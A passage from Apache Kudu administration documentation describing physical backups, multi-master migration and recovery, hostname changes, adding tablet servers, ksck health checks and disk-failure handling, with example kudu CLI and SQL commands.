\nNOTE: Taking full backups on a regular basis is far more resource and time intensive\nthan incremental backups. It is recommended to upgrade to Kudu 1.10+ as soon as possible.\n\n[[physical_backup]]\n=== Physical backups of an entire node\n\nKudu does not yet provide built-in physical backup and restore functionality.\nHowever, it is possible to create a physical backup of a Kudu node (either\ntablet server or master) and restore it later.\n\nWARNING: The node to be backed up must be offline during the procedure, or else\nthe backed up (or restored) data will be inconsistent.\n\nWARNING: Certain aspects of the Kudu node (such as its hostname) are embedded in\nthe on-disk data. As such, it's not yet possible to restore a physical backup of\na node onto another machine.\n\n. Stop all Kudu processes in the cluster. This prevents the tablets on the\n backed up node from being rereplicated elsewhere unnecessarily.\n\n. If creating a backup, make a copy of the WAL, metadata, and data directories\n on each node to be backed up. It is important that this copy preserve all file\n attributes as well as sparseness.\n\n. If restoring from a backup, delete the existing WAL, metadata, and data\n directories, then restore the backup via move or copy. As with creating a\n backup, it is important that the restore preserve all file attributes and\n sparseness.\n\n. Start all Kudu processes in the cluster.\n\n== Common Kudu workflows\n\n[[migrate_to_multi_master]]\n=== Migrating to Multiple Kudu Masters\n\nFor high availability and to avoid a single point of failure, Kudu clusters should be created with\nmultiple masters. Many Kudu clusters were created with just a single master, either for simplicity\nor because Kudu multi-master support was still experimental at the time. This workflow demonstrates\nhow to migrate to a multi-master configuration. It can also be used to migrate from two masters to\nthree, with straightforward modifications. Note that the number of masters must be odd.\n\nWARNING: The workflow is unsafe for adding new masters to an existing configuration that already has\nthree or more masters. Do not use it for that purpose.\n\nWARNING: An even number of masters doesn't provide any benefit over having one fewer masters. This\nguide should always be used for migrating to three masters.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user. The example\ncommands assume the Kudu UNIX user is `kudu`, which is typical.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing vendor-specific tools, the workflow also presupposes familiarity with them, and the vendor's\ninstructions should be used instead, as details may differ.\n\n==== Prepare for the migration\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\n will be unavailable.\n\n. Decide how many masters to use. The number of masters should be odd. Three or five node master\n configurations are recommended; they can tolerate one or two failures, respectively.\n\n. Perform the following preparatory steps for the existing master:\n* Identify and record the directories where the master's write-ahead log (WAL) and data live. If\n using Kudu system packages, their default locations are \/var\/lib\/kudu\/master, but they may be\n customized via the `fs_wal_dir` and `fs_data_dirs` configuration parameters. The commands below\n assume that `fs_wal_dir` is \/data\/kudu\/master\/wal and `fs_data_dirs` is \/data\/kudu\/master\/data.\n Your configuration may differ. 
For more information on configuring these directories, see the\n link:configuration.html#directory_configuration[Kudu Configuration docs].\n* Identify and record the port the master is using for RPCs. The default port value is 7051, but it\n may have been customized using the `rpc_bind_addresses` configuration parameter.\n* Identify the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 2>\/dev\/null\n----\nmaster_data_dir:: existing master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 2>\/dev\/null\n4aab798a69e94fab8d77069edff28ce0\n----\n+\n* Optional: configure a DNS alias for the master. The alias could be a DNS cname (if the machine\n already has an A record in DNS), an A record (if the machine is only known by its IP address),\n or an alias in \/etc\/hosts. The alias should be an abstract representation of the master (e.g.\n `master-1`).\n+\nWARNING: Without DNS aliases it is not possible to recover from permanent master failures without\nbringing the cluster down for maintenance, and as such, it is highly recommended.\n+\n. If you have Kudu tables that are accessed from Impala, you must update\nthe master addresses in the Apache Hive Metastore (HMS) database.\n* If you set up the DNS aliases, run the following statement in `impala-shell`,\nreplacing `master-1`, `master-2`, and `master-3` with your actual aliases.\n+\n[source,sql]\n----\nALTER TABLE table_name\nSET TBLPROPERTIES\n('kudu.master_addresses' = 'master-1,master-2,master-3');\n----\n+\n* If you do not have DNS aliases set up, see Step #11 in the Performing\nthe migration section for updating HMS.\n+\n. Perform the following preparatory steps for each new master:\n* Choose an unused machine in the cluster. The master generates very little load\n so it can be collocated with other data services or load-generating processes,\n though not with another Kudu master from the same configuration.\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n* Choose and record the port the master should use for RPCs.\n* Optional: configure a DNS alias for the master (e.g. `master-2`, `master-3`, etc).\n\n[[perform-the-migration]]\n==== Perform the migration\n\n. Stop all the Kudu processes in the entire cluster.\n\n. Format the data directory on each new master machine, and record the generated UUID. Use the\n following command sequence:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>]\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 2>\/dev\/null\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 2>\/dev\/null\nf5624e05f40649b79a757629a69d061e\n----\n\n. 
If using CM, add the new Kudu master roles now, but do not start them.\n* If using DNS aliases, override the empty value of the `Master Address` parameter for each role\n (including the existing master role) with that master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. Rewrite the master's Raft configuration with the following command, executed on the existing\n master machine:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> <all_masters>\n----\n+\nmaster_data_dir:: existing master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nall_masters:: space-separated list of masters, both new and existing. Each entry in the list must be\n a string of the form `<uuid>:<hostname>:<port>`\nuuid::: master's previously recorded UUID\nhostname::: master's previously recorded hostname or alias\nport::: master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 4aab798a69e94fab8d77069edff28ce0:master-1:7051 f5624e05f40649b79a757629a69d061e:master-2:7051 988d8ac6530f426cbe180be5ba52033d:master-3:7051\n----\n\n. Modify the value of the `master_addresses` configuration parameter for both existing master and new masters.\n The new value must be a comma-separated list of all of the masters. Each entry is a string of the form `<hostname>:<port>`\nhostname:: master's previously recorded hostname or alias\nport:: master's previously recorded RPC port number\n\n. Start the existing master.\n\n. Copy the master data to each new master with the following command, executed on each new master\n machine.\n+\nWARNING: If your Kudu cluster is secure, in addition to running as the Kudu UNIX user, you must\n authenticate as the Kudu service user prior to running this command.\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> <existing_master>\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nexisting_master:: RPC address of the existing master and must be a string of the form\n`<hostname>:<port>`\nhostname::: existing master's previously recorded hostname or alias\nport::: existing master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 master-1:7051\n----\n\n. Start all of the new masters.\n+\nWARNING: Skip the next step if using CM.\n+\n. Modify the value of the `tserver_master_addrs` configuration parameter for each tablet server.\n The new value must be a comma-separated list of masters where each entry is a string of the form\n `<hostname>:<port>`\nhostname:: master's previously recorded hostname or alias\nport:: master's previously recorded RPC port number\n\n. Start all of the tablet servers.\n. 
If you have Kudu tables that are accessed from Impala and you didn't set up\nDNS aliases, update the HMS database manually in the underlying database that\nprovides the storage for HMS.\n* The following is an example SQL statement you should run in the HMS database:\n+\n[source,sql]\n----\nUPDATE TABLE_PARAMS\nSET PARAM_VALUE =\n 'master-1.example.com,master-2.example.com,master-3.example.com'\nWHERE PARAM_KEY = 'kudu.master_addresses' AND PARAM_VALUE = 'old-master';\n----\n+\n* In `impala-shell`, run:\n+\n[source,bash]\n----\nINVALIDATE METADATA;\n----\n\n\n==== Verify the migration was successful\n\nTo verify that all masters are working properly, perform the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line\n tool. See <<ksck>> for more details.\n\n=== Recovering from a dead Kudu Master in a Multi-Master Deployment\n\nKudu multi-master deployments function normally in the event of a master loss. However, it is\nimportant to replace the dead master; otherwise a second failure may lead to a loss of availability,\ndepending on the number of available masters. This workflow describes how to replace the dead\nmaster.\n\nDue to https:\/\/issues.apache.org\/jira\/browse\/KUDU-1620[KUDU-1620], it is not possible to perform\nthis workflow without also restarting the live masters. As such, the workflow requires a\nmaintenance window, albeit a potentially brief one if the cluster was set up with DNS aliases.\n\nWARNING: Kudu does not yet support live Raft configuration changes for masters. As such, it is only\npossible to replace a master if the deployment was created with DNS aliases or if every node in the\ncluster is first shut down. See the <<migrate_to_multi_master,multi-master migration workflow>> for\nmore details on deploying with DNS aliases.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing vendor-specific tools the workflow also presupposes familiarity with\nit and the vendor's instructions should be used instead as details may differ.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user, typically\n`kudu`.\n\n==== Prepare for the recovery\n\n. If the deployment was configured without DNS aliases perform the following steps:\n* Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\n will be unavailable.\n* Shut down all Kudu tablet server processes in the cluster.\n\n. Ensure that the dead master is well and truly dead. Take whatever steps needed to prevent it from\n accidentally restarting; this can be quite dangerous for the cluster post-recovery.\n\n. Choose one of the remaining live masters to serve as a basis for recovery. The rest of this\n workflow will refer to this master as the \"reference\" master.\n\n. Choose an unused machine in the cluster where the new master will live. The master generates very\n little load so it can be collocated with other data services or load-generating processes, though\n not with another Kudu master from the same configuration.\n The rest of this workflow will refer to this master as the \"replacement\" master.\n\n. 
Perform the following preparatory steps for the replacement master:\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n\n. Perform the following preparatory steps for each live master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir` and\n `fs_data_dirs` configuration parameters. Please note if you've set `fs_data_dirs` to some directories\n other than the value of `fs_wal_dir`, it should be explicitly included in every command below where\n `fs_wal_dir` is also included. For more information on configuring these directories, see the\n link:configuration.html#directory_configuration[Kudu Configuration docs].\n* Identify and record the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 2>\/dev\/null\n----\nmaster_data_dir:: live master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Perform the following preparatory steps for the reference master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir` and\n `fs_data_dirs` configuration parameters. Please note if you've set `fs_data_dirs` to some directories\n other than the value of `fs_wal_dir`, it should be explicitly included in every command below where\n `fs_wal_dir` is also included. For more information on configuring these directories, see the\n link:configuration.html#directory_configuration[Kudu Configuration docs].\n* Identify and record the UUIDs of every master in the cluster, using the following command:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica cmeta print_replica_uuids --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> 2>\/dev\/null\n----\nmaster_data_dir:: reference master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu local_replica cmeta print_replica_uuids --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c 2a73eeee5d47413981d9a1c637cce170 1c3f3094256347528d02ec107466aef3\n----\n+\n. Using the two previously-recorded lists of UUIDs (one for all live masters and one for all\n masters), determine and record (by process of elimination) the UUID of the dead master.\n\n==== Perform the recovery\n\n. Format the data directory on the replacement master machine using the previously recorded\n UUID of the dead master. 
Use the following command sequence:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] --uuid=<uuid>\n----\n+\nmaster_wal_dir:: replacement master's previously recorded WAL directory\nmaster_data_dir:: replacement master's previously recorded data directory\nuuid:: dead master's previously recorded UUID\n+\nExample::\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data --uuid=80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Copy the master data to the replacement master with the following command:\n+\nWARNING: If your Kudu cluster is secure, in addition to running as the Kudu UNIX user, you must\n authenticate as the Kudu service user prior to running this command.\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> <reference_master>\n----\n+\nmaster_wal_dir:: replacement master's previously recorded WAL directory\nmaster_data_dir:: replacement master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nreference_master:: RPC address of the reference master; must be a string of the form\n`<hostname>:<port>`\nhostname::: reference master's previously recorded hostname or alias\nport::: reference master's previously recorded RPC port number\n+\nExample::\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 master-2:7051\n----\n+\n. If using CM, add the replacement Kudu master role now, but do not start it.\n* Override the empty value of the `Master Address` parameter for the new role with the replacement\n master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. If the cluster was set up with DNS aliases, reconfigure the DNS alias for the dead master to point\n at the replacement master.\n\n. If the cluster was set up without DNS aliases, perform the following steps:\n* Stop the remaining live masters.\n* Rewrite the Raft configurations on these masters to include the replacement master. See Step 4 of\n <<perform-the-migration, Perform the Migration>> for more details.\n\n. Start the replacement master.\n\n. Restart the remaining masters in the new multi-master deployment. While the masters are shut down,\n there will be an availability outage, but it should last only as long as it takes for the masters\n to come back up.\n\nCongratulations, the dead master has been replaced! To verify that all masters are working properly,\nconsider performing the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line\n tool. See <<ksck>> for more details.\n\n=== Removing Kudu Masters from a Multi-Master Deployment\n\nIf a multi-master deployment has been allocated more masters than desired, the following steps should\nbe taken to remove the unwanted masters.\n\nWARNING: In planning the new multi-master configuration, keep in mind that the number of masters\nshould be odd and that three or five node master configurations are recommended.\n\nWARNING: Dropping the number of masters below the number of masters currently needed for a Raft\nmajority can incur data loss. 
To mitigate this, ensure that the leader master is not removed during\nthis process.\n\n==== Prepare for the removal\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\nwill be unavailable.\n\n. Identify the UUID and RPC address of the current leader of the multi-master deployment by visiting the\n`\/masters` page of any master's web UI. This master must not be removed during this process; its\nremoval may result in severe data loss.\n\n. Stop all the Kudu processes in the entire cluster.\n\n. If using CM, remove the unwanted Kudu master.\n\n==== Perform the removal\n\n. Rewrite the Raft configuration on the remaining masters to include only the remaining masters. See\nStep 4 of <<perform-the-migration,Perform the Migration>> for more details.\n\n. Remove the data directories and WAL directory on the unwanted masters. This is a precaution to\nensure that they cannot start up again and interfere with the new multi-master deployment.\n\n. Modify the value of the `master_addresses` configuration parameter for the masters of the new\nmulti-master deployment. If migrating to a single-master deployment, the `master_addresses` flag\nshould be omitted entirely.\n\n. Start all of the masters that were not removed.\n\n. Modify the value of the `tserver_master_addrs` configuration parameter for the tablet servers to\nremove any unwanted masters.\n\n. Start all of the tablet servers.\n\n==== Verify the removal was successful\n\nTo verify that all masters are working properly, perform the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line\n tool. See <<ksck>> for more details.\n\n=== Changing the master hostnames\n\nTo prevent long maintenance windows when replacing dead masters, DNS aliases should be used. If the\ncluster was set up without aliases, changing the hostnames can be done by following the steps\nbelow.\n\n==== Prepare for the hostname change\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\nwill be unavailable.\n\n. Note the UUID and RPC address of every master by visiting the `\/masters` page of any master's web\nUI.\n\n. Stop all the Kudu processes in the entire cluster.\n\n. Set up the new hostnames to point to the masters and verify all servers and clients properly\nresolve them.\n\n==== Perform the hostname change\n\n. Rewrite each master\u2019s Raft configuration with the following command, executed on all master hosts:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 00000000000000000000000000000000 <all_masters>\n----\n+\nFor example:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 4aab798a69e94fab8d77069edff28ce0:new-master-name-1:7051 f5624e05f40649b79a757629a69d061e:new-master-name-2:7051 988d8ac6530f426cbe180be5ba52033d:new-master-name-3:7051\n----\n\n. Change the masters' gflagfile so the `master_addresses` parameter reflects the new hostnames.\n\n. Change the `tserver_master_addrs` parameter in the tablet servers' gflagfiles to the new\nhostnames.
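\n+\nAs a concrete illustration, the relevant gflagfile entries after the change might look like the following hypothetical excerpt; the values must match your own new hostnames and RPC ports:\n+\n[source,bash]\n----\n# Master gflagfile (hypothetical excerpt):\n--master_addresses=new-master-name-1:7051,new-master-name-2:7051,new-master-name-3:7051\n\n# Tablet server gflagfile (hypothetical excerpt):\n--tserver_master_addrs=new-master-name-1:7051,new-master-name-2:7051,new-master-name-3:7051\n----\n\n. 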
Start up the masters.\n\n. To verify that all masters are working properly, perform the following sanity checks:\n\n.. Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n.. Run the command below to verify all masters are up and listening. The UUIDs\nshould be the same and belong to the same master as before the hostname change:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu master list new-master-name-1:7051,new-master-name-2:7051,new-master-name-3:7051\n----\n\n. Start all of the tablet servers.\n\n. Run a Kudu system check (ksck) on the cluster using the `kudu` command line\ntool. See <<ksck>> for more details. After startup, some tablets may be\nunavailable as it takes some time to initialize all of them.\n\n. If you have Kudu tables that are accessed from Impala, update the HMS\ndatabase manually in the underlying database that provides the storage for HMS.\n\n.. The following is an example SQL statement you should run in the HMS database:\n+\n[source,sql]\n----\nUPDATE TABLE_PARAMS\nSET PARAM_VALUE =\n 'new-master-name-1:7051,new-master-name-2:7051,new-master-name-3:7051'\nWHERE PARAM_KEY = 'kudu.master_addresses'\nAND PARAM_VALUE = 'master-1:7051,master-2:7051,master-3:7051';\n----\n+\n.. In `impala-shell`, run:\n+\n[source,bash]\n----\nINVALIDATE METADATA;\n----\n+\n.. Verify updating the metadata worked by running a simple `SELECT` query on a\nKudu-backed Impala table.\n\n[[adding_tablet_servers]]\n=== Best Practices When Adding New Tablet Servers\n\nA common workflow when administering a Kudu cluster is adding additional tablet\nserver instances, in an effort to increase storage capacity, decrease load or\nutilization on individual hosts, increase compute power, etc.\n\nBy default, any newly added tablet servers will not be utilized immediately\nafter their addition to the cluster. Instead, newly added tablet servers will\nonly be utilized when new tablets are created or when existing tablets need to\nbe replicated, which can lead to imbalanced nodes. It's recommended to run\nthe rebalancer CLI tool just after adding a new tablet server into the cluster,\nas described in the enumerated steps below.\n\nAvoid placing multiple tablet servers on a single node. Doing so\ndefeats the purpose of increasing the overall storage capacity of a Kudu\ncluster and increases the likelihood of tablet unavailability when a single\nnode fails (the latter drawback is not applicable if the cluster is properly\nconfigured to use the\nlink:https:\/\/kudu.apache.org\/docs\/administration.html#rack_awareness[location\nawareness] feature).\n\nTo add additional tablet servers to an existing cluster, the\nfollowing steps can be taken to ensure tablet replicas are uniformly\ndistributed across the cluster:\n\n1. Ensure that Kudu is installed on the new machines being added to the\ncluster, and that the new instances have been\nlink:https:\/\/kudu.apache.org\/docs\/configuration.html#_configuring_tablet_servers[\ncorrectly configured] to point to the pre-existing cluster. Then, start up\nthe new tablet server instances.
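\n+\nFor instance, when Kudu was installed via system packages and the new server's gflagfile already points `--tserver_master_addrs` at the existing masters, starting the instance might look like the following sketch (service names can differ by platform):\n+\n[source,bash]\n----\n# Start the newly configured tablet server via the system service.\n$ sudo service kudu-tserver start\n----\n2. Verify that the new instances check in with the Kudu Master(s)\nsuccessfully. 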
A quick method for verifying they've successfully checked in\nwith the existing Master instances is to view the Kudu Master WebUI,\nspecifically the `\/tablet-servers` section, and validate that the newly\nadded instances are registered and heartbeating.\n3. Once the tablet server(s) are successfully online and healthy, follow\nthe steps to run the\nlink:https:\/\/kudu.apache.org\/docs\/administration.html#rebalancer_tool[\nrebalancing tool] which will spread existing tablet replicas to the newly added\ntablet servers.\n4. After the rebalancer tool has completed, or even during its execution,\nyou can check on the health of the cluster using the `ksck` command-line utility\n(see <<ksck>> for more details).\n\n[[ksck]]\n=== Checking Cluster Health with `ksck`\n\nThe `kudu` CLI includes a tool named `ksck` that can be used for gathering\ninformation about the state of a Kudu cluster, including checking its health.\n`ksck` will identify issues such as under-replicated tablets, unreachable\ntablet servers, or tablets without a leader.\n\n`ksck` should be run from the command line as the Kudu admin user, and requires\nthe full list of master addresses to be specified:\n\n[source,bash]\n----\n$ sudo -u kudu kudu cluster ksck master-01.example.com,master-02.example.com,master-03.example.com\n----\n\nTo see a full list of the options available with `ksck`, use the `--help` flag.\nIf the cluster is healthy, `ksck` will print information about the cluster, a\nsuccess message, and return a zero (success) exit status.\n\n----\nMaster Summary\n UUID | Address | Status\n----------------------------------+-----------------------+---------\n a811c07b99394df799e6650e7310f282 | master-01.example.com | HEALTHY\n b579355eeeea446e998606bcb7e87844 | master-02.example.com | HEALTHY\n cfdcc8592711485fad32ec4eea4fbfcd | master-03.example.com | HEALTHY\n\nTablet Server Summary\n UUID | Address | Status\n----------------------------------+------------------------+---------\n a598f75345834133a39c6e51163245db | tserver-01.example.com | HEALTHY\n e05ca6b6573b4e1f9a518157c0c0c637 | tserver-02.example.com | HEALTHY\n e7e53a91fe704296b3a59ad304e7444a | tserver-03.example.com | HEALTHY\n\nVersion Summary\n Version | Servers\n---------+-------------------------\n 1.7.1 | all 6 server(s) checked\n\nSummary by table\n Name | RF | Status | Total Tablets | Healthy | Recovering | Under-replicated | Unavailable\n----------+----+---------+---------------+---------+------------+------------------+-------------\n my_table | 3 | HEALTHY | 8 | 8 | 0 | 0 | 0\n\n | Total Count\n----------------+-------------\n Masters | 3\n Tablet Servers | 3\n Tables | 1\n Tablets | 8\n Replicas | 24\nOK\n----\n\nIf the cluster is unhealthy, for instance if a tablet server process has\nstopped, `ksck` will report the issue(s) and return a non-zero exit status, as\nshown in the abbreviated snippet of `ksck` output below:\n\n----\nTablet Server Summary\n UUID | Address | Status\n----------------------------------+------------------------+-------------\n a598f75345834133a39c6e51163245db | tserver-01.example.com | HEALTHY\n e05ca6b6573b4e1f9a518157c0c0c637 | tserver-02.example.com | HEALTHY\n e7e53a91fe704296b3a59ad304e7444a | tserver-03.example.com | UNAVAILABLE\nError from 127.0.0.1:7150: Network error: could not get status from server: Client connection negotiation failed: client connection to 127.0.0.1:7150: connect: Connection refused (error 61) (UNAVAILABLE)\n\n... 
(full output elided)\n\n==================\nErrors:\n==================\nNetwork error: error fetching info from tablet servers: failed to gather info for all tablet servers: 1 of 3 had errors\nCorruption: table consistency check error: 1 out of 1 table(s) are not healthy\n\nFAILED\nRuntime error: ksck discovered errors\n----\n\nTo verify data integrity, the optional `--checksum_scan` flag can be set, which\nwill ensure the cluster has consistent data by scanning each tablet replica and\ncomparing results. The `--tables` or `--tablets` flags can be used to limit the\nscope of the checksum scan to specific tables or tablets, respectively. For\nexample, checking data integrity on the `my_table` table can be done with the\nfollowing command:\n\n[source,bash]\n----\n$ sudo -u kudu kudu cluster ksck --checksum_scan --tables my_table master-01.example.com,master-02.example.com,master-03.example.com\n----\n\nBy default, `ksck` will attempt to use a snapshot scan of the table, so the\nchecksum scan can be done while writes continue.\n\nFinally, `ksck` also supports output in JSON format using the `--ksck_format`\nflag. JSON output contains the same information as the plain text output, but\nin a format that can be used by other tools. See `kudu cluster ksck --help` for\nmore information.\n\n[[change_dir_config]]\n=== Changing Directory Configurations\n\nFor higher read parallelism and larger volumes of storage per server, users may\nwant to configure servers to store data in multiple directories on different\ndevices. Once a server is started, users must go through the following steps\nto change the directory configuration.\n\nUsers can add or remove data directories to an existing master or tablet server\nvia the `kudu fs update_dirs` tool. Data is striped across data directories,\nand when a new data directory is added, new data will be striped across the\nunion of the old and new directories.\n\nNOTE: Unless the `--force` flag is specified, Kudu will not allow for the\nremoval of a directory across which tablets are configured to spread data. If\n`--force` is specified, all tablets configured to use that directory will fail\nupon starting up and be replicated elsewhere.\n\nNOTE: If the link:configuration.html#directory_configuration[metadata\ndirectory] overlaps with a data directory, as was the default prior to Kudu\n1.7, or if a non-default metadata directory is configured, the\n`--fs_metadata_dir` configuration must be specified when running the `kudu fs\nupdate_dirs` tool.\n\nNOTE: Only new tablet replicas (i.e. brand new tablets' replicas and replicas\nthat are copied to the server for high availability) will use the new\ndirectory. Existing tablet replicas on the server will not be rebalanced across\nthe new directory.\n\nWARNING: All of the command line steps below should be executed as the Kudu\nUNIX user, typically `kudu`.\n\n. The tool can only run while the server is offline, so establish a maintenance\n window to update the server. The tool itself runs quickly, so this offline\n window should be brief, and as such, only the server to update needs to be\n offline. However, if the server is offline for too long (see the\n `follower_unavailable_considered_failed_sec` flag), the tablet replicas on it\n may be evicted from their Raft groups. To avoid this, it may be desirable to\n bring the entire cluster offline while performing the update.\n\n. Run the tool with the desired directory configuration flags. 
For example, if a\n cluster was set up with `--fs_wal_dir=\/wals`, `--fs_metadata_dir=\/meta`, and\n `--fs_data_dirs=\/data\/1,\/data\/2,\/data\/3`, and `\/data\/3` is to be removed (e.g.\n due to a disk error), run the command:\n\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs update_dirs --force --fs_wal_dir=\/wals --fs_metadata_dir=\/meta --fs_data_dirs=\/data\/1,\/data\/2\n----\n+\n\n. Modify the values of the `fs_data_dirs` flags for the updated server. If using\n CM, make sure to only update the configurations of the updated server, rather\n than of the entire Kudu service.\n\n. Once complete, the server process can be started. When Kudu is installed using\n system packages, `service` is typically used:\n\n+\n[source,bash]\n----\n$ sudo service kudu-tserver start\n----\n+\n\n\n[[disk_failure_recovery]]\n=== Recovering from Disk Failure\nKudu nodes can only survive failures of disks on which certain Kudu directories\nare mounted. For more information about the different Kudu directory types, see\nthe section on link:configuration.html#directory_configuration[Kudu Directory\nConfigurations]. The table below describes this behavior across different Apache Kudu\nreleases.\n\n[[disk_failure_behavior]]\n.Kudu Disk Failure Behavior\n[cols=\"<,<,<\",options=\"header\"]\n|===\n| Node Type | Kudu Directory Type | Kudu Releases that Crash on Disk Failure\n| Master | All | All\n| Tablet Server | Directory containing WALs | All\n| Tablet Server | Directory containing tablet metadata | All\n| Tablet Server | Directory containing data blocks only | Pre-1.6.0\n|===\n\nWhen a disk failure occurs that does not lead to a crash, Kudu will stop using\nthe affected directory, shut down tablets with blocks on the affected\ndirectories, and automatically re-replicate the affected tablets to other\ntablet servers. The affected server will remain alive and print messages to the\nlog indicating the disk failure, for example:\n\n----\nE1205 19:06:24.163748 27115 data_dirs.cc:1011] Directory \/data\/8\/kudu\/data marked as failed\nE1205 19:06:30.324795 27064 log_block_manager.cc:1822] Not using report from \/data\/8\/kudu\/data: IO error: Could not open container 0a6283cab82d4e75848f49772d2638fe: \/data\/8\/kudu\/data\/0a6283cab82d4e75848f49772d2638fe.metadata: Read-only file system (error 30)\nE1205 19:06:33.564638 27220 ts_tablet_manager.cc:946] T 4957808439314e0d97795c1394348d80 P 70f7ee61ead54b1885d819f354eb3405: aborting tablet bootstrap: tablet has data in a failed directory\n----\n\nWhile in this state, the affected node will avoid using the failed disk,\nleading to lower storage volume and reduced read parallelism. The administrator\nshould schedule a brief window to <<change_dir_config,update the node's\ndirectory configuration>> to exclude the failed disk.\n\nWhen the disk is repaired, remounted, and ready to be reused by Kudu, take the\nfollowing steps:\n\n. Make sure that the Kudu 